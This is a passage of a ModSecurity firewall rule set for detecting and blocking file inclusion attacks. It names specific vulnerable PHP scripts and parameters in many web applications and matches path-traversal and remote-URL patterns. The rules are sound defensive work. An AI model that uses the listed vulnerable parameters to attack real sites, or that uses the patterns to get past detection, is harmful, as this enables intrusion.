"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009316,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,30686'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:cfgIncludeDirectory/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009393) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS YouTube Blog cuerpo.php base_archivo Local File Inclusion SecRule REQUEST_LINE "@contains /cuenta/cuerpo.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009393,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS YouTube Blog cuerpo.php base_archivo Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,30345'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:base_archivo "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS YouTube Blog cuerpo.php base_archivo Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009329) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ZABBIX locales.php srclang Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /locales.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009329,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ZABBIX locales.php srclang Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,33965'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:srclang "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ZABBIX locales.php srclang Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009661) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS artmedic weblog artmedic_print.php date Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /artmedic_print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009661,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS artmedic weblog artmedic_print.php date Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:date "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS artmedic weblog artmedic_print.php date Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010771) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS asaher pro view_messages.php row_y5_site_configuration Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /view_messages.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010771,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS asaher pro view_messages.php row_y5_site_configuration Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/asaherpro-rfi.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:row_y5_site_configuration[templates_folder]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS asaher pro view_messages.php row_y5_site_configuration Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010772) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS asaher pro view_blog_comments.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /view_blog_comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010772,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS asaher pro view_blog_comments.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/asaherpro-rfi.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:row_y5_site_configuration[templates_folder]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS asaher pro view_blog_comments.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010773) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS asaher pro view_blog_archives.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /view_blog_archives.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010773,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS asaher pro view_blog_archives.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/asaherpro-rfi.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:row_y5_site_configuration[templates_folder]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS asaher pro view_blog_archives.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010774) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS asaher pro add_comments.php row_y5_site_configuration Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /add_comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010774,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS asaher pro add_comments.php row_y5_site_configuration Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/asaherpro-rfi.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:row_y5_site_configuration[templates_folder]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS asaher pro add_comments.php row_y5_site_configuration Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010775) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS asaher pro downloads.php row_y5_site_configuration Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /downloads.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010775,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS asaher pro downloads.php row_y5_site_configuration Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/asaherpro-rfi.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:row_y5_site_configuration[templates_folder]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS asaher pro downloads.php row_y5_site_configuration Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010776) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS asaher pro emailsender.php row_y5_site_configuration Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /emailsender.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010776,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS asaher pro emailsender.php row_y5_site_configuration Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/asaherpro-rfi.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:row_y5_site_configuration[templates_folder]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS asaher pro emailsender.php row_y5_site_configuration Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010777) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS asaher pro left_menu.php row_y5_site_configuration Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /left_menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010777,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS asaher pro left_menu.php row_y5_site_configuration Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/asaherpro-rfi.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:row_y5_site_configuration[templates_folder]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS asaher pro left_menu.php row_y5_site_configuration Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009790) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS beLive arch.php arch Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /arch.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009790,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS beLive arch.php arch Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34968'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:arch "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS beLive arch.php arch Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008966) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ccTiddly index.php cct_base parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008966,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ccTiddly index.php cct_base parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/7336'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:cct_base/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ccTiddly index.php cct_base parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008967) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ccTiddly proxy.php cct_base parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /handle/proxy.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008967,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ccTiddly proxy.php cct_base parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/7336'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:cct_base/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ccTiddly proxy.php cct_base parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008968) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ccTiddly header.php cct_base parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008968,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ccTiddly header.php cct_base parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/7336'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:cct_base/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ccTiddly header.php cct_base parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008969) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ccTiddly include.php cct_base parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/include.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008969,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ccTiddly include.php cct_base parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/7336'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:cct_base/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ccTiddly include.php cct_base parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008970) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ccTiddly workspace.php cct_base parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/workspace.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008970,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ccTiddly workspace.php cct_base parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/7336'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:cct_base/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ccTiddly workspace.php cct_base parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009367) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS cmsWorks lib.module.php mod_root Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /lib.module.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009367,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS cmsWorks lib.module.php mod_root Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,29914'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:mod_root=\s*(https?|ftps?|php))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS cmsWorks lib.module.php mod_root Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010847) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS com_if_nexus controller Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010847,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS com_if_nexus controller Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10754'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_if_nexus&" "chain" SecRule &TX:'/RFI.*ARGS:controller/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS com_if_nexus controller Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009874) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS cpCommerce _functions.php GLOBALS Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /_functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009874,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS cpCommerce _functions.php GLOBALS Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,35103'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:GLOBALS[prefix]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS cpCommerce _functions.php GLOBALS Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009875) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS cpCommerce _functions.php GLOBALS Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /_functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009875,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS cpCommerce _functions.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,35103'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[prefix] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS cpCommerce _functions.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009435) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS e107 123 FlashChat Module 123flashchat.php e107path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /123flashchat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009435,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS e107 123 FlashChat Module 123flashchat.php e107path Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:e107path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS e107 123 FlashChat Module 123flashchat.php e107path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009436) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS e107 123 FlashChat Module 123flashchat.php e107path Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /123flashchat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009436,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS e107 123 FlashChat Module 123flashchat.php e107path Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:e107path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS e107 123 FlashChat Module 123flashchat.php e107path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009932) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible eFront database.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /libraries/database.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009932,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible eFront database.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.owasp.org/index.php/PHP_File_Inclusion'" SecRule QUERY_STRING|REQUEST_BODY "(?i:\x2Ephp\x3F.{0,300}\x3D(http\x3A|ftp\x3A|https\x3A|ftps\x3A))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible eFront database.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009224) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ea-gBook index_inc.php inc_ordner parameter local file inclusion SecRule REQUEST_LINE "@contains /index_inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009224,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ea-gBook index_inc.php inc_ordner parameter local file inclusion',tag:'web-application-attack',tag:'bugtraq,33774'" SecRule ARGS:inc_ordner "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ea-gBook index_inc.php inc_ordner parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009225) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ea-gBook index_inc.php inc_ordner parameter remote file inclusion SecRule REQUEST_LINE "@contains /index_inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009225,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ea-gBook index_inc.php inc_ordner parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,33774'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:inc_ordner/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ea-gBook index_inc.php inc_ordner parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008849) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms add3rdparty.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/3rdparty/adminpart/add3rdparty.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008849,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms add3rdparty.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms add3rdparty.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008850) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addpolling.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/polling/adminpart/addpolling.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008850,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addpolling.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addpolling.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008851) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addcontact.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/contact/adminpart/addcontact.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008851,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addcontact.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addcontact.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008852) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addbrandnews.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/brandnews/adminpart/addbrandnews.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008852,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addbrandnews.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addbrandnews.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008853) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addnewsletter.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/newsletter/adminpart/addnewsletter.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008853,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addnewsletter.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addnewsletter.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008854) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addgame.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/game/adminpart/addgame.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008854,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addgame.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET 